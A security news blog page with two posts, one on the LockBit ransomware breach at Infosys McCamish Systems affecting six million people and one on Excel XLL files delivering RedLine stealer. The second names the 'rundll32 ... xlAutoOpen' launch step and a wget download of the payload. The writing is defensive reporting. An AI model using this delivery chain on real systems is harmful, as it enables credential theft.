Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Banking Information. Show all posts
SSNs
Banking Information customer data compromise Data Breach Data Leak IMS Information Security LockBit LockBit ransomware Ransomware attack SSNs

LockBit Ransomware Attack on Infosys McCamish Systems Exposes Sensitive Data of Over Six Million Individuals

 

Infosys McCamish Systems (IMS) recently disclosed that a LockBit ransomware attack earlier this year compromised sensitive information of more than six million individuals. IMS, a multinational corporation specializing in business consulting, IT, and outsourcing services, primarily serves the insurance and financial services industries. The company has a significant presence in the U.S., catering to large financial institutions such as the Bank of America and seven out of the top ten insurers in the country. 

In February 2024, IMS informed the public about the ransomware attack that occurred in November 2023. Initially, the company reported that the personal data of around 57,000 Bank of America customers had been compromised. LockBit, the group responsible for the attack, claimed to have encrypted 2,000 computers within the IMS network. A recent notification to U.S. authorities revealed that the total number of affected individuals now exceeds six million. The notification outlined the steps taken by IMS, including the involvement of third-party eDiscovery experts, to conduct a thorough review of the compromised data. 

This review aimed to identify the personal information accessed and determine the individuals impacted. The compromised data includes a wide range of sensitive information, such as Social Security Numbers (SSNs), dates of birth, medical records, biometric data, email addresses and passwords, usernames and passwords, driver’s license or state ID numbers, financial account information, payment card details, passport numbers, tribal ID numbers, and U.S. military ID numbers. To mitigate the risks associated with this data exposure, IMS is offering affected individuals a free two-year identity protection and credit monitoring service through Kroll. 

The notification letters provided instructions on how to access these services. IMS has not disclosed the full list of impacted clients, but the notification mentioned Oceanview Life and Annuity Company (OLAC), an Arizona-based provider of fixed and fixed-indexed annuities, as one of the affected organizations. The list of impacted data owners may be updated as more customers request to be named in the filing. 

This breach highlights the critical importance of robust cybersecurity measures and the significant impact such attacks can have on both individuals and large financial institutions. The LockBit ransomware attack on IMS serves as a stark reminder of the vulnerabilities within the digital infrastructure of major corporations and the far-reaching consequences of data breaches.
Read more »
User Privacy
Banking Information Malicious Campaign malware User Privacy

Threat Actors are Using Malicious Microsoft Excel files to Steal Banking Credentials

 

Threat actors are spreading Excel XLL files that download and install the RedLine password and information-stealing malware via website contact forms and discussion forums. 

RedLine is a credential-theft malware that steals cookies, user names and passwords, and banking details stored in web browsers, as well as FTP credentials and files from a compromised device. 

The malware can also implement commands, download and operate further malware, and take screenshots of the active Windows screen. The stolen data is sent back to the hackers to be sold on the dark web or used for other malicious activities. 

The XLL files are identical to dynamic hyperlink libraries (DLLs), with the addition of an ‘xlAutoOpen’ option run by Excel. This function (an add-in, basically) allows Excel to read and write data, import it from other sources, design custom functions and perform multiple tasks. 

However, if the DLL is implemented manually via regsvr32.exe command or the 'rundll32 name.xll, xlAutoOpen' command will extract the wget.exe program to the %UserProfile% folder and use it to download the RedLine binary from a remote site.

Once the malware is installed by the victim, it will look out for valuable information to steal, including credentials and credit cards stored in the Chrome, Edge, Firefox, Brave, and Opera browsers. Therefore, if you receive an email or other message distributing these types of files, simply delete the message and report it as spam. 

As XLL files are executables, threat actors can use them to perform a variety of malicious behavior on a device. Users should be careful when receiving these files and should make sure they are getting the files from a trusted source before proceeding and opening them. 

According to security experts, XLL files are rarely sent as attachments but instead installed through another program or via your Windows admin. Thus, any such file that comes in the mail should be handled with extra precaution. Aside from being vigilant with attachments and links in emails, users should also make sure to keep their endpoints secure with strong and refreshed passwords, as well as that their system runs safeguards, such as antivirus solutions and firewalls.
Read more »
Subscribe to: Posts (Atom)